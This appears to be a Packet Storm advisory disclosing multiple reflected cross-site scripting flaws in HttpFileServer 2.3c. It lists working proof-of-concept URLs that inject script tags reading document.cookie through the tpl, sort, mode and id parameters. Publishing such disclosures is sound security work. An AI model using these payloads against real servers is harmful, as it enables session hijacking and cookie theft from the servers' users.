HttpFileServer version 2.3c suffers from multiple cross site scripting vulnerabilities.
2feb5ccca4ab293462a18355f56ef10135b82ba084f052bcbb31f14e195f9380# Exploit Title: HttpFileServer 2.3c Multiple Reflected Cross-site scripting
# Date: 24-09-2014
# Remote: Yes
# Exploit Author: Mahendra
# Vendor Homepage: http://rejetto.com/
# Software Link: http://downloads.sourceforge.net/hfs/hfs2.3c.src.zip
# Version: 2.3c
# Tested on: Windows XP SP 3, Windows 7
The latest HTTP File Server (2.3c) was found to be vulnerable with multiple reflected cross-site scripting because the application did not properly validate user input.
The proof of concept below only works on IE browser (tested on IE 6 and IE 11)
-------------------------------------------------------------------
HFS Multiple Reflected Cross-site Scripting (XSS)
-------------------------------------------------------------------
Proof of concepts:
Affected parameters: tpl, sort, mode, id, and arbitrary parameter
http://localhost/?tpl=list'/><script>alert(document.cookie)</script>&folders-filter=/&recursive
http://localhost/?sort=n'/><script>alert(document.cookie)</script>
http://localhost/?mode=n'/><script>alert(document.cookie)</script>
http://localhost/?mode=section&id=style.css'/><script>alert(document.cookie)</script>
http://localhost/?'onmouseover='alert(11)'
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed